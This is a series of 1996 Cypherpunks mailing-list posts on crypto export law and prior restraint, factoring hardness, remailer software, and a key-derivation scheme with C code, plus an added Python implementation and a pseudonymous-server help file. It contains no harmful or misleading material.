In-Reply-To: <199609220730.AAA20792@dfw-ix2.ix.netcom.com>
Message-ID:

On Sun, 22 Sep 1996, Bill Stewart wrote:

> The First Amendment does not contain the phrase "national security"
> anywhere in it. It does, however, begin with a rather explicit
> "Congress shall make no law" which it applies to a bunch of things.
> However, the body of the Constitution does say there should be a
> Supreme Court, and the Supreme Court has (fairly reasonably) given itself
> the job of deciding what's Constitutional and what's not.
> The Supremes have, over the years, made a bunch of generally outrageous
> decisions about what kinds of speech are protected by the First Amendment
> and what kinds aren't, though their opinions have been gradually
> improving since some of the really appalling ones earlier in the century.

I did a little searching and couldn't find anything about a national security exception in the Constitution. It's already a stretch to claim that disclosure of information vital to "national security" is treason. The Espionage Act, which is so obviously unconstitutional, seems to make "harmful" speech illegal.

Mark
--
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From aba at dcs.ex.ac.uk Sun Sep 22 21:26:35 1996
From: aba at dcs.ex.ac.uk (Adam Back)
Date: Mon, 23 Sep 1996 12:26:35 +0800
Subject: provably hard PK cryptosystems
Message-ID: <199609222158.WAA00325@server.test.net>

extracting from part of another thread...

Dimitri Vulis writes:
> Adam Back writes:
> > [...]
> > I think I remember that you posted some time ago a way to have
> > two plausible decryptions for one ciphertext, to enable things like
> > duress keys, in terms of RSA. The problem with this, however is
> > that RSA is currently very slow to use in its pure form for
> > messages.
>
> I don't recall this one... My feeling about RSA is that one of these
> days there will be a breakthrough allowing much faster factorization
> (either through a better algorithm on a conventional computer, or by
> a practical quantum computer) and then all the codes based on
> factorization will become essentially plaintext. It's time to start
> looking for other hard problems to base PKC on.

I'm not sure about quantum computers, some people who know much more about particle physics than I do seemed initially sceptical, and didn't think it was doable. However I have read some optimistic sounding news clippings (on the list) which sounded as if things are progressing well, with techniques being found using redundancy to get around what were earlier problems of reliability. Is this accurate reporting (thinking of garbled stories by over enthusiastic journalists)? I'd be interested to hear opinions from anyone who does know about particle physics about the likelihood of practical quantum computers being practical in the next 20 years or so.

RSA has always had problems with two pitfalls in any proof of its hardness: no proof that RSA is as hard as factoring, and no proof that factoring is hard. Rabin and variants of it at least have the proof of being as hard as factoring.

You mentioned your opinion that a vastly better factoring algorithm may yet be found. What about the possibility of finding proof of a useful lower bound for the complexity of factoring, do you have any thoughts on the likelihood of this being achieved? That would be a very significant result, and in the absence of a quantum attack would be as good as it gets.
It would allow you to make realistic calculations about physical limits of attacking it, in a similar manner to the entropy calculations possible for brute force of symmetric ciphers. (Heat death of the sun before a solution even if every particle was part of hardware key cracking computer type arguments).

One other area that did sound promising was some kind of mapping problem in n dimensional tiling that Tim was discussing at a physical meet while I was over in the US. A news clipping posted to cypherpunks a short time ago was talking about a researcher who had constructed a crypto system related to the problem of finding paths in a tiling problem (sounded like the same problem). The interesting part was that the researcher was reported as having a proof of hardness. Similarly is this being reported accurately?

> E.g., does anyone know of any progress made on public-key
> cryptosystems based on the word problem in semigroups, described in
> Neal Wagner and Marianne Magyarik, _A public key cryptosystem based
> on the word problem_, Advances in Cryptology: Proceedings of Crypto
> '84, G. R. Blakley and D. Chaum, eds., Lecture Notes in Computer
> Sciences #196, Springer Verlag, 1985, and also mentioned in Wayne
> Patterson, _Mathematical Cryptology for Computer Scientists and
> Mathematicians_, Rowman and Littlefield, 1987?

Not familiar with the problem. Is it something you could explain briefly, or are there any on-line papers on the subject?

> From what I heard, NSA tried very hard to implement it and failed,
> and the Soviets actually built a cryptosystem similar to what they
> described. I tried to duplicate what the Soviets supposedly did, but
> without success.

Adam
--
#!/bin/perl -sp0777i
Message-ID: <199609230210.VAA01661@mailhub.amaranth.com>

In <199609222016.PAA00572 at homeport.org>, on 09/22/96 at 03:16 PM, Adam Shostack said:

> However, there is a real need for things like Mixmaster/DOS,
>the WinSock remailer, and other tools that allow the average home user
>to set up a remailer without taking the several days or more to
>install a new OS on their system.

There is a Dos version available. It is being used by Private Idaho for its Mixmaster Support.

I am looking into doing an OS/2 port of Mixmaster to be used by my OS/2 front End.

--
-----------------------------------------------------------
William H. Geiger III http://www.amaranth.com/~whgiii
Geiger Consulting WebExplorer & Java Enhanced!!!

Merlin Beta Test Site - WarpServer SMP Test Site

Author of PGPMR2 - PGP Front End for MR/2 Ice
Look for MR/2 Tips & Rexx Scripts
Get Work Place Shell for Windows!!
PGP & MR/2 the only way for secure e-mail.
Finger whgiii at amaranth.com for PGP Key and other info
-----------------------------------------------------------

From gbroiles at netbox.com Sun Sep 22 21:33:09 1996
From: gbroiles at netbox.com (Greg Broiles)
Date: Mon, 23 Sep 1996 12:33:09 +0800
Subject: Macintosh Mixmaster port... Who's doing it?
Message-ID: <3.0b19.32.19960922162606.006c1644@ricochet.net>

At 03:16 PM 9/22/96 -0500, Adam Shostack wrote:

> A real Mac port of Mixmaster, that integrated with Claris
>EMailer and Eudora would be a huge boon to the millions of Mac users
>out there. I have no doubt that Vinnie's mac crypto conference talked
>a lot about this sort of thing.

Actually, the Mac crypto conference didn't spend any time at all on Mixmaster - which is not intended as a criticism of either the conference or of Mixmaster, but it just didn't happen.

I gave a very short talk and said that I thought the Mac needed three apps, for people who wanted to jump in and write something useful to the cause of privacy on the net and didn't want to reinvent any wheels: a remailer client with a good user interface, a Mac-native remailer, and an implementation of DC-nets. Mixmaster would, of course, address two of those three. Lucky tells me that there is already a Mac implementation of DC-nets, but it doesn't seem to be very well known.

My impression of the demographics of the conference was that it was folks who are mostly working developers who aren't necessarily up-to-the-minute on crypto and ecommerce stuff, but are interested enough to at least think about including it in their applications.

I'm pottering around with a Java-based remailer that acts like a POP client so it can run on a client machine, not a Unix box; but other people should take that as a challenge to see if they can finish one before/better than me, not a reason to avoid writing one. Hal Finney has already done some very nice work with Java and mailing; see his home page (the address of which I don't have immediately at hand) for more details.

For what it's worth, I think future remailer/Mixmaster development might do well in Java. I'm not especially sold on or trusting of the alleged security or trustability features of Java (sorry, no offense) but I *do* think it's a neat tool for building non-machine specific network aware applications. Ignore the fact that people use it to build silly animations or that downloaded applets may or may not be secure - it's still useful as a development tool.

--
Greg Broiles                | "We pretend to be their friends,
gbroiles at netbox.com       | but they fuck with our heads."
http://www.io.com/~gbroiles |
                            |

From snow at smoke.suba.com Sun Sep 22 21:58:36 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 23 Sep 1996 12:58:36 +0800
Subject: The Near-Necessity of Health Insurance
In-Reply-To:
Message-ID: <199609230140.UAA00443@smoke.suba.com>

Mr. May said:
> However, I am thinking about getting some. Not so much because I'm getting
> older, but because I fear a new phenomenon: hospital emergency rooms
> refusing admittance of patients unless they can present the proper
> patient-unit ID card (showing one is enrolled in Blue Shield, Blue Cross,
> Kaiser, or whatever).
> Anyway, I'm thinking of finally bowing to the inevitable and starting to
> fork out $200-300 a month for health care I am unlikely to routinely use.

There is a "class" of insurance (and I am sure that someone will correct me if I am wrong) whose name I forgot, but it is more or less "Calamity" or "serious accident" insurance. It doesn't cover things like sore throats, physicals (something you might want to look into, they can catch things before they get serious, and you are getting along in years), simple stitches &etc, but does cover things like getting nailed by a drunk driver, as presumably accidental shootings by black clad ninjas.

Consult your local fraudmeister for more information.

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From adam at homeport.org Sun Sep 22 22:05:19 1996
From: adam at homeport.org (Adam Shostack)
Date: Mon, 23 Sep 1996 13:05:19 +0800
Subject: Evolving algorithm for faster brute force key searches?
In-Reply-To:
Message-ID: <199609230314.WAA01337@homeport.org>

Timothy C. May wrote:

| With some weak ciphers, this might work. I think Schneier makes some
| comments about who's looked at this. But weak ciphers are not too
| interesting.

At the most recent Crypto, someone mentioned that FEAL is useful because just about any new attack you can think of works well against it. I think it was Susan Langford.
Weak systems are thus useful for research and training purposes.

I suspect Tim is on the money with a genetic algorithm having a flat `fitness landscape,' but there may be something that a human misses which an evolved algorithm finds. Also, it may be possible to evolve something against a reduced round version of a cipher (using a training space that is not flat) that will still work better than brute force against a full system.

If you have cycles to spare, it might be an interesting avenue of research.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From snow at smoke.suba.com Sun Sep 22 22:44:07 1996
From: snow at smoke.suba.com (snow)
Date: Mon, 23 Sep 1996 13:44:07 +0800
Subject: Workers Paradise. /Political rant.
In-Reply-To: <19960918160153703.AAE88@IO-ONLINE.COM>
Message-ID: <199609230247.VAA00522@smoke.suba.com>

Mr. Adams wrote:
> On Sun, 15 Sep 1996 17:13:53 -0700, Dale Thorn wrote:
>>> And that's good. The world population really should go back to around
> say, explaining an integral. (or even an equation for that matter)
> As a side note, how about some real welfare reform: mandatory birth control
> (and pay for that; it's *much* cheaper) and benefits go DOWN for additional
> births.

But, But, But...What about the Children?

Petro, Christopher C.
petro at suba.com
snow at smoke.suba.com

From Scottauge at aol.com Sun Sep 22 22:51:27 1996
From: Scottauge at aol.com (Scottauge at aol.com)
Date: Mon, 23 Sep 1996 13:51:27 +0800
Subject: Internet File System?
Message-ID: <960922232858_108284943@emout01.mail.aol.com>

This is actually a good idea.

There is something in the UNIX world called NFS (network file system). It is based on TCP/IP sockets.

I do not know if you know anything about UNIX, but the file system used does not have logical drives (like a: or b: etc), just one huge tree that can span across many harddrives on many computers, thus making them all look like one.
NFS helps to connect the other computer's file systems to the network tree. I think it is pretty cool... There is an RFC for it, though I do not remember the number. I read it once cuz I was planning a windows 95 version so I can hook my laptop up to my UNIX computers, but I found software to do it with and was like, why should I kill time on it when I could be using it to make money! It is very complete and designed to be implemented in C. Since Java is so close to C, a port could probably be made fairly easily (provided ya know something about writing file systems/operating systems ;) ) From blancw at cnw.com Sun Sep 22 22:54:51 1996 From: blancw at cnw.com (blanc) Date: Mon, 23 Sep 1996 13:54:51 +0800 Subject: LD Message-ID: <01BBA8C5.36647EC0@king1-20.cnw.com> Dr. Dimitri Vulius, you made this remark to someone: ...You really should get to know L.D. better before you repeat the lies Timmy May spreads about him. ......................................................................................... May I recommend that you read the content within these urls: http://www.csn.net/~ldetweil/ and especially: ftp://crvax.sri.com/risks/15/risks-15.27 (and 28) These contain a history which will clarify for you some of the comments made about L.D.'s relationship to the list, Tim May, etc. .. Blanc From pgut001 at cs.auckland.ac.nz Sun Sep 22 23:37:24 1996 From: pgut001 at cs.auckland.ac.nz (pgut001 at cs.auckland.ac.nz) Date: Mon, 23 Sep 1996 14:37:24 +0800 Subject: Transforming variable-length to fixed keys Message-ID: <84345225525232@cs26.cs.auckland.ac.nz> I posted this to sci.crypt recently but the response to it was rather underwhelming, so I thought I'd repost it here to see if anyone has any comments on it. What it is is a scheme for transforming arbitrary user keys (typically a long passphrase) into a fixed-length key for a particular algorithm. This has the following properties: 1. 
The user key 'userKey' is transformed into an algorithm-specific key 'key' using a number of 'iterations' of a hash algorithm 'hash()'.
2. The transformation is strongly serialized so that any form of attack involving parallelization or precomputation isn't possible.
3. The transformation is non-reversible, so that recovering the transformed key won't recover the original key.
4. The result of the transformation is algorithm-dependent, so that if an attacker recovers a transformed key for one algorithm they can't recover the transformed key (from the same user key) for another algorithm.
5. The transformation can be iterated as often as required to make password-guessing attacks difficult.
6. The transformation process is algorithm-independent and can use any type of hash algorithm and original and transformed key size.

The transformation algorithm (which was designed with the help of John Kelsey) is as follows:

    key[] = { 0 };
    state = hash( algorithm, mode, parameters, userKey );

    for count = 1 to iterations
        for length = 1 to keyLength (in hash_output_size blocks)
            state = hash( state );
            key[ length ] = hash( state, userKey );

The state acts as an RNG which ensures that the key hashing is serialized. The initial state depends on all encryption parameters, not just the user key. If we hashed the user key directly and then used it for a number of algorithms then someone who could recover the transformed key for one algorithm could compromise it if used for other algorithms (for example recovering a DES key would also recover half an IDEA key). Hashing all algorithm-related parameters means that a successful attack on an algorithm, mode, or configuration won't allow the key for any other algorithm, mode, or configuration to be recovered.
The code which implements the iterated hashing is:

    /* Hash the variable-length input to a fixed-length output */
    memset( key, 0, keyLength );
    for( count = 0; count < iterations; count++ )
        {
        for( keyIndex = 0; keyIndex < keyLength; keyIndex += hashOutputSize )
            {
            /* state = hash( state ); key[ n ] = hash( state, userKey ) */
            hash( state, state, hashOutputSize, HASH_ALL );
            hash( NULL, state, hashOutputSize, HASH_START );
            hash( temp, userKey, userKeyLength, HASH_END );
            /*     |       |          |
                 output  input    input size */

            /* Copy as much of the hashed data as required to the output.
               Only the final block may be shorter than hashOutputSize; a
               full block copies hashOutputSize bytes */
            length = keyLength - keyIndex;
            if( length > hashOutputSize )
                length = hashOutputSize;
            for( i = 0; i < length; i++ )
                key[ keyIndex + i ] ^= temp[ i ];
            }
        }

Peter.

From rodger at interramp.com Sun Sep 22 23:49:23 1996
From: rodger at interramp.com (Will rodger)
Date: Mon, 23 Sep 1996 14:49:23 +0800
Subject: Where to write crypto?
Message-ID: <199609230203.WAA03418@interramp.com>

-----BEGIN PGP SIGNED MESSAGE-----

On Sat, 21 Sep 1996, Dan McGuirk wrote:
>>| > If I want to go to a country outside the United States to write
>>| > cryptographic code that will be freely distributable, what's the best
>>| > place to go?
>>|
>>| Or, on the other hand, is there no way that a U.S. citizen can legally do
>>| this?
>>

To which Adam Shostack replied:

>> That's not clear. The ITARs seem, on their face, to create a
>>prior restraint on speech based on its content, and forbid Americans
>>the right to leave the country to pursue their livelihoods. The odds
>>of getting persecuted seem pretty low.

Could be. But prominent crypto atty. Ken Bass told me he thought such actions would be vigorously prosecuted - quicker than you could say "global proliferation."

Thing to notice here: no prominent cryptographer in the US has come forth and said "yes, I helped write strong crypto abroad." Which isn't to say most of them aren't traveling abroad frequently these days - take, e.g. the presence of M. Blaze, W. Diffie et al. at the OECD in Paris this week.
>> As to the (predictable) comment that I'm not doing this, I'd
>>be happy to entertain offers of crypto work that are not in the US,
>>possibly leading to me being a test case.
>>

Call before you do, Adam; I'd kill to have that story first...

Will Rodger
Washington Bureau Chief
Inter at ctive Week

From markm at voicenet.com Mon Sep 23 00:50:30 1996
From: markm at voicenet.com (Mark M.)
Date: Mon, 23 Sep 1996 15:50:30 +0800
Subject: Go away CIA
In-Reply-To:
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 22 Sep 1996, Shane Brath wrote:

> On Sat, 21 Sep 1996, Wearen Life wrote:
>
> > I won't be surprised if they were ALSO watching who was visiting your page.
> > I think now is the time to start looking in your hard drive or floppy
> > disk for anything that my incrimanate you. (did i spell that right)?
> > My 2 cents.
>
> But how would they go about globally watching who goes to your URL, unless
> they hack into your server and look at the log, or have a network sniffer
> at an access point feeding you?

That may have been what they were trying to do when trying to snarf the passwd file. I can't imagine why they would want to do this -- there's nothing illegal about mirroring the page. Maybe I just lack imagination...

Mark
- --
PGP encrypted mail preferred.
Key fingerprint = d61734f2800486ae6f79bfeb70f95348
http://www.voicenet.com/~markm/

From bdavis at thepoint.net Mon Sep 23 01:17:00 1996
From: bdavis at thepoint.net (Brian Davis)
Date: Mon, 23 Sep 1996 16:17:00 +0800
Subject: Bernstein hearing: The Press Release
In-Reply-To:
Message-ID:

On Sun, 22 Sep 1996, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> On Sun, 22 Sep 1996, Bill Stewart wrote:
>
> > The First Amendment does not contain the phrase "national security"
> > anywhere in it. It does, however, begin with a rather explicit
> > "Congress shall make no law" which it applies to a bunch of things.
> > However, the body of the Constitution does say there should be a
> > Supreme Court, and the Supreme Court has (fairly reasonably) given itself
> > the job of deciding what's Constitutional and what's not.
> > The Supremes have, over the years, made a bunch of generally outrageous
> > decisions about what kinds of speech are protected by the First Amendment
> > and what kinds aren't, though their opinions have been gradually
> > improving since some of the really appalling ones earlier in the century.
>
> I did a little searching and couldn't find anything about a national security
> exception in the Constitution. It's already a stretch to claim that disclosure
> of information vital to "national security" is treason. The Espionage Act, which
> is so obviously unconstitutional, seems to make "harmful" speech illegal.

There isn't such a clause.
The allowed restrictions were developed in case law.

Constitutional literalists take note: the First Amendment says nothing about what the executive branch or the states can do ....

EBD

>
> Mark
> - --
> PGP encrypted mail preferred.
> Key fingerprint = d61734f2800486ae6f79bfeb70f95348
> http://www.voicenet.com/~markm/
>

From wmono at direct.ca Mon Sep 23 01:41:59 1996
From: wmono at direct.ca (William Ono)
Date: Mon, 23 Sep 1996 16:41:59 +0800
Subject: Jena Remailer
In-Reply-To:
Message-ID:

Sorry to followup on myself, but I made a mistake in the help file.

On Sun, 22 Sep 1996, William Ono wrote:

> How do I ..
> ~~~~~~~~~~~
> ..request Email to be delivered?
>
> - Create a file containing the following:
>
> Reply-To: address at for.delivery
>
> Leave a blank line after the header.
>
> - Save the file.
>
> - Run 'pgp -esa -u "pseudonym" anon at as-node filename' to sign the mail
> with the nym's key, and encrypt it for the server.
>

- Mail the result to anon at as-node.jena.thur.de with a Subject: send header.

Sorry about that, folks.

--
William Ono PGP Key: F3F716BD
fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome! "640k ought to be enough for everybody."
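The key transformation described in the "Transforming variable-length to fixed keys" post above, as an added example that is not part of the original post or of its author's code. It also shows the weakness the post warns about, where hashing the passphrase directly makes a short key a prefix of a longer one. Assumptions: SHA-256 as the default hash, a length-prefixed encoding of the initial-state fields, and the names `derive_key`, `initial_state` and `naive_key`.

```python
"""Added example: iterated, algorithm-bound passphrase-to-key transformation."""
import hashlib
import struct


def _h(hash_name, *parts):
    """hash() from the post: one digest over the concatenated inputs."""
    return hashlib.new(hash_name, b"".join(parts)).digest()


def initial_state(user_key, algorithm, mode, parameters, hash_name="sha256"):
    """state = hash( algorithm, mode, parameters, userKey ).

    Assumption: each field is length-prefixed so that ("DES", "CBC") and
    ("DESC", "BC") cannot produce the same input; the post gives no encoding.
    """
    fields = (algorithm.encode(), mode.encode(), parameters, user_key)
    encoded = b"".join(struct.pack(">I", len(f)) + f for f in fields)
    return _h(hash_name, encoded)


def derive_key(user_key, algorithm, mode, parameters, key_length,
               iterations, hash_name="sha256"):
    """Return key_length bytes bound to the passphrase AND the cipher setup."""
    if key_length < 1 or iterations < 1:
        raise ValueError("key_length and iterations must be positive")
    state = initial_state(user_key, algorithm, mode, parameters, hash_name)
    hash_size = len(state)
    key = bytearray(key_length)                 # key[] = { 0 }
    for _ in range(iterations):
        for offset in range(0, key_length, hash_size):
            # Each step needs the previous state, so the work is serialized.
            state = _h(hash_name, state)
            block = _h(hash_name, state, user_key)
            # min(), not a modulo: a modulo would copy 0 bytes whenever the
            # remaining length is an exact multiple of the hash size.
            n = min(hash_size, key_length - offset)
            for i in range(n):
                key[offset + i] ^= block[i]     # accumulate across iterations
    return bytes(key)


def naive_key(user_key, key_length, hash_name="sha256"):
    """The approach the post warns against: hash once, then truncate."""
    digest = _h(hash_name, user_key)
    if key_length > len(digest):
        raise ValueError("naive_key cannot exceed one hash block")
    return digest[:key_length]


if __name__ == "__main__":
    pw = b"correct horse battery staple"        # constructed sample passphrase
    des = derive_key(pw, "DES", "CBC", b"", 8, 1000)
    idea = derive_key(pw, "IDEA", "CBC", b"", 16, 1000)
    print("DES  key:", des.hex())
    print("IDEA key:", idea.hex())
    print("derived keys share a prefix:", idea[:8] == des)
    print("naive keys share a prefix:  ",
          naive_key(pw, 16)[:8] == naive_key(pw, 8))
```
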
From jimbell at pacifier.com Mon Sep 23 01:53:34 1996 From: jimbell at pacifier.com (jim bell) Date: Mon, 23 Sep 1996 16:53:34 +0800 Subject: Bernstein hearing: The Press Release Message-ID: <199609230537.WAA15530@mail.pacifier.com> At 05:15 PM 9/22/96 -0700, Rich Burroughs wrote: >At 04:39 PM 9/21/96 -0800, Jim Bell wrote: >>At 02:03 PM 9/18/96 -0700, John Gilmore wrote: > >[snip] >>>* Any legal framework that allows a government bureaucrat to >>>censor speech before it happens is an unconstitutional prior restraint. >>>The government is not allowed to set up such a drastic scheme >>>unless they can prove that publication of such information will >>>"surely result in direct, immediate, and irreparable damage to our >>>Nation or its people" and that the regulation at issue is necessary >>>to prevent this damage. >> >>At the risk of being a devil's advocate, let me suggest that you are >>conceding too much even with the preceding paragraph. The 1st amendment >>says nothing about preventing speech which (even admittedly) would result >>in "direct, immediate, and irreparable damage to our nation or its people." >[snip] > >Jim, that's a quote of Potter Stewart from the Pentagon Papers case, if I'm >not mistaken. It's not written in the Constitution, but Supreme Court >precedent is the next best thing as far as con law goes. Under the circumstances, I think it would be wise to actually EXPAND our protections. A lot has happened in the last 25 years. If a reasonably extensive list were made of situations and circumstances where the wool was pulled over the eyes of Americans by government...and how subsequent developments showed that these things were best revealed THEN and not later...it could be reasonably argued that there is no or almost no area where the "direct, immediate, and irreparable damage" exception is likely to realistically exist. 
You should point out that the Pentagon Papers case was decided notwithstanding an extraordinarily generous set of assumptions common in Cold-War America about the power and authority of government, many if not most of which would be no longer considered valid.

Put the opposition on the spot: Insist that they provide a substantial number of examples where speech was expected, was attempted to be restricted by gov't under such an exception, where that speech actually occurred (either by refusal of the court to intervene or by refusal of a party to the case to restrict his speech), and show how this actually caused any "direct, immediate, and irreparable damage." In the absence of such examples, it is reasonable to presume that, generally, they don't exist or are so rare as to be ignorable. (For example, in the Progressive case from the middle 70's, the gov't dropped its case. What harm occurred?)

>The government can restrict speech in time, place or manner, according to
>the courts. Restricting content is more difficult, and places a much
>heavier burden on the gov.
>
>To expect people writing about and arguing the case to completely ignore
>the existing case law is foolish, IMHO.

I am _not_ suggesting that case law be "ignored." Rather, point out that the case law, even though it goes in your favor, was still decided in a thoroughly biased atmosphere and therefore further reductions in government authority are appropriate.

Jim Bell
jimbell at pacifier.com

From wombat at mcfeely.bsfs.org Mon Sep 23 01:54:06 1996
From: wombat at mcfeely.bsfs.org (Rabid Wombat)
Date: Mon, 23 Sep 1996 16:54:06 +0800
Subject: Internet File System?
In-Reply-To: <960922232858_108284943@emout01.mail.aol.com>
Message-ID:

On Sun, 22 Sep 1996 Scottauge at aol.com wrote:

> There is something in the UNIX world called NFS (network file system). It is
> based on TCP/IP sockets.
> > I do not know if you know anything about UNIX, but the file system used does > not have logical drives (like a: or b: etc), just one huge tree that can span > across many harddrives on many computers, thus making them all look like one. > NFS helps to connect the other computer's file systems to the network tree. > > I think it is pretty cool... Yeah, real secure too. ;) ;) ;) - r.w. From gnu at toad.com Mon Sep 23 01:56:08 1996 From: gnu at toad.com (John Gilmore) Date: Mon, 23 Sep 1996 16:56:08 +0800 Subject: Bernstein hearing: The Press Release In-Reply-To: <199609212340.QAA07773@mail.pacifier.com> Message-ID: <199609230544.WAA08826@toad.com> The EFF press release on the Bernstein hearing said: > >* Any legal framework that allows a government bureaucrat to > >censor speech before it happens is an unconstitutional prior restraint. > >The government is not allowed to set up such a drastic scheme > >unless they can prove that publication of such information will > >"surely result in direct, immediate, and irreparable damage to our > >Nation or its people" and that the regulation at issue is necessary > >to prevent this damage. Jim Bell said: > At the risk of being a devil's advocate, let me suggest that you are > conceding too much even with the preceding paragraph. The 1st amendment > .... [long discussion] .... The wording there is taken directly from the controlling Supreme Court case, which I believe is the Pentagon Papers case. The example used in that case was the departure date and route of a ship carrying US troops to war. The government could sue people who threatened to publish such information, prior to publication, and have some chance of winning the case. It's not a guarantee, just a pre-qualification. The idea is that if they CAN'T show such a danger, they have NO chance of winning. The Supreme Court didn't even say that publishing the sailing dates of troop transports *could* be prior-restrained. 
What they said was that they would consider such a case if it ever got to them. Cases which didn't meet such a high standard should just be taken care of by the lower courts.

We aren't conceding anything. We're pointing out that the export control law doesn't even meet the standard that the supreme court has already set for laws like this.

You might want to hold the government to a higher standard than the threshold they set in the Pentagon Papers case. Myself, I think they did an excellent job, especially considering that it was wartime and that the document the New York Times wanted to publish was classified but had been leaked. They didn't permit the government to prior-restrain publication of it ANYWAY. The "direct, immediate and irreparable damage" phrase was them merely trying to think up a hypothetical document that they MIGHT allow prior restraint to apply to.

My opinion on criminal and civil law is quite different from the Supreme Court's. Still, I am working on having the Supreme Court confirm my opinion in a particular area -- that of the crypto export control laws. I'd rather bring them a nice simple case that focuses on just one thing. It's a lot easier for them to decide about the thing I really care about, if it doesn't bring in extraneous factors like exactly where the line should be for permitting prior restraint.

The Supreme Court would ignore the prior restraint line issue anyway, because it isn't a factor in this case. The government isn't arguing that they have the right to prior-restrain us because of direct, immediate and irreparable damage. Instead they argue that the publication itself is being controlled only for its function, not for the content of the publication, and therefore in controlling the function, they can "incidentally" control the publication. And if they can legitimately control the speech, then what's all this fuss about prior restraint when it's punishable speech anyway?
This is the set of issues that the Supreme Court would tend to look at. John PS: I'm not a lawyer, and I didn't ask a lawyer to read this over, so I might have some parts wrong. From matt at lust.bio.uts.edu.au Mon Sep 23 02:05:58 1996 From: matt at lust.bio.uts.edu.au (Matthew Gream) Date: Mon, 23 Sep 1996 17:05:58 +0800 Subject: (Fwd) Australian "ITAR" regulations In-Reply-To: <199609230132.LAA08960@rosella.osa.com.au> Message-ID: <199609230619.QAA16932@lust.bio.uts.edu.au> Hi there, > An anonymous opinion from inside the Defence Dept holds that electronic > bits on a wire do not constitute goods, and as a result if you ship > electronically, you are not subject to the regulations. If you ship a > CD or floppy or other physical media containing software, you violate the > regulations. Watch out for those anonymous opinions; I received exactly the opposite opinion when I spoke to the Defence Signals Directorate about the issue (back in 1994) -- after specifically asking about a few hypothetical cases. Of course, either opinion may be correct, which is the real problem! > I'll add this to the SSLeay legality FAQ - standard disclaimers apply > of course, obtain professional legal advice before exporting SSLeay. Definitely ... what a pain, however :-(. Best of luck! Matthew. -- Matthew Gream -- matt at lust.bio.uts.edu.au. From wmono at direct.ca Mon Sep 23 02:06:41 1996 From: wmono at direct.ca (William Ono) Date: Mon, 23 Sep 1996 17:06:41 +0800 Subject: Jena Remailer In-Reply-To: <199609221720.KAA15948@sirius.infonex.com> Message-ID: On Sun, 22 Sep 1996, Mixmaster wrote: > The trickiest thing about it - by far - is the inscrutable English > translation of the helpfile. I have been trying for over a week to make [...] > Can any native English speaker please paraphrase the account start-up > procedure for us? I took a stab at re-writing the help file, and I've attached it below. 
The operator of jena might want to use it instead of the help file currently being distributed, after correcting any errors and adding the German sections back in. IMHO, the How do I.. section is the most useful.

I believe these instructions are correct -- I was able to follow them to create a nym, and use it. YMMV.

--
William Ono PGP Key: F3F716BD
fingerprint = A8 0D B9 0F 40 A7 D6 64 B3 00 04 74 FD A7 12 C9 = fingerprint
PGP-encrypted mail welcome! "640k ought to be enough for everybody."

Pseudonymous Server Help
~~~~~~~~~~~~~~~~~~~~~~~~

This pseudonymous server allows private, pseudonymous communication. When used with chained remailers, true pseudonymity without fear of a connection to a real address can be achieved.

Some things to remember about this server:

- When creating a pseudonym, a special PGP key created for this purpose is sent to the server. This will be used to name the pseudonym, and assign an Email address.

  * The hexadecimal key-ID forms the Email address. For example, if the nym's key is 0x01020304, the address will be: anon-01020304 at as-node.jena.thur.de

  * The user-ID of the key contains the pseudonym, only. Note: This is different from the convention, which is to include the Email address in angle brackets.

- To publish something under a pseudonym, send an encrypted, signed email to this server, which will post it to one or more Usenet newsgroups, or send it via Email.

- Anyone is able to reply to items published under a pseudonym. Anything sent to the pseudonym's Email address is stored on the server, encrypted with the pseudonym's public key.

- Because the server does not know (and does not want to know) the true identity behind a pseudonym, mail cannot be delivered directly.

- Mail is delivered only when a signed, encrypted request is received from a nym. At this time, all waiting mail is sent to the address specified in the encrypted message.

- The server never answers. If something goes wrong, the job will be dropped silently.
All commands are sent in the Subject: header of the unencrypted (plaintext) message, and should be Emailed to anon at as-node.jena.thur.de

There are two commands:

help - sends the server's help file.

send - delivers waiting mail. The body of the Email should be a signed, encrypted message with a Reply-To: header, which is where the mail will be delivered via Mixmaster remailers. (The key that the body is signed with determines which nym's mail is delivered.) The nym's mail spool is then purged. To prevent replay attacks, the signature must be less than 48 hours old. If the signature is not valid, the request is bounced and the headers are saved, encrypted, in the nym's mail spool.

If no valid command is found in the Subject: header, the body is checked for a signed, encrypted (to the server) message.

If the signature is from a keyID belonging to an existing nym, and the check fails, the headers are saved, encrypted, in the nym's mailspool. This is to alert the owner of the nym to a possible spoof attempt.

If the signature check fails because the keyID that the signature is from is unknown, the decrypted body is assumed to contain a public key for a new nym, which will be added to the server's database.

If the signature is valid, the decrypted body should be a header for the outbound mail, followed by a blank line, then the body for the outbound mail.

The following are headers considered valid by the server:

* Subject: (or Anon-Subject:)
* To: (or Anon-To:)
* References:
* Newsgroups: (or Post-To: or Anon-Post-To:)
* Followup-To: (or Anon-Followup-To:)
  - This must be specified as a -single- newsgroup if cross-posting

All outbound messages have Precedence: junk to silently drop error messages.

If any of the above conditions are not met, the server will silently drop the job.

This server must not be used to transmit illegal materials, flames, or binary data. I may disable nyms that misuse the server.
The German telecommunication laws may require me to modify the server to allow access to intelligence agencies without notification. You are advised to use Mixmaster remailers and other alias servers -- it is recommended that you do not request mail to be sent to your own Email address.

How do I ..
~~~~~~~~~~~

..create an identity?

- Run 'pgp -kg' to generate a new key.
  + Select your keysize. (a 1204-bit or larger key is recommended)
  + Enter your pseudonym as the user-ID. Do not enter an Email address.
  + Enter a passphrase. (Make sure not to forget it!)

- Run 'pgp -kxa "pseudonym" > anonid.asc' to extract your public key.

- Run 'pgp -esa -u "pseudonym" anon at as-node anonid.asc' to sign and encrypt the extracted key for the server.

- Mail the result to anon at as-node.jena.thur.de with a Subject: header that does not include the words 'help' or 'send' (It is recommended that you do this through one or more anonymous remailers.)

- Test your nym by posting to a test group (de.test is recommended due to the location of the server) and wait several days before requesting mail delivery.

- If it didn't work, repeat the entire procedure. It's possible that the key-ID already exists in the server's database and belongs to another pseudonym.

..Email a message?

- Write the mail body, remembering not to include any information about your true identity.

- Add the following headers at the top of the mail:

  To: destination at of.mail
  Subject: Outbound mail's subject line

  Leave a blank line between the headers and the body.

- Save the file.

